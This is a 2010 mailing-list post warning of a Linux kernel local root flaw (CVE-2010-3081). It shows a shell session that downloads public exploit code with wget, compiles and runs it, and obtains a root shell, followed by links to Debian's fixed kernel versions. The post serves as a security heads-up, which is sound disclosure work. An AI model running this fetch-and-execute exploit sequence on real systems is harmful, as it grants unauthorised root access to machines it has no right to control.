[SR-Users] [OT] Local root exploit for the x86_64 Linux kernel ia32syscall emulation vulnerability

Iñaki Baz Castillo ibc at aliax.net
Thu Oct 14 02:19:37 CEST 2010


In any Linux Kernel 64 bits < 2.6.36-rc4:


--------------------------------------------
ibc at myserver:/tmp$ whoami
ibc

ibc at myserver:/tmp$ wget http://packetstormsecurity.org/1009-exploits/robert_you_suck.c

ibc at myserver:/tmp$ gcc -o putada robert_you_suck.c

ibc at myserver:/tmp$ ./putada
resolved symbol commit_creds to 0xffffffff81092120
resolved symbol prepare_kernel_cred to 0xffffffff81091fa0
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0

sh-3.2# whoami
root   <----------- OPSSSS !!!
--------------------------------------------


More info:

  http://packetstormsecurity.org/filedesc/robert_you_suck.c.html


Fixed in Debian (kernel patch backported):

 http://security-tracker.debian.org/tracker/CVE-2010-3081
 - lenny (security)  2.6.26-25lenny1  fixed
 - lenny-backports  2.6.32-23~bpo50+1  fixed
 - squeeze  2.6.32-23  fixed


-- 
Iñaki Baz Castillo
<ibc at aliax.net>


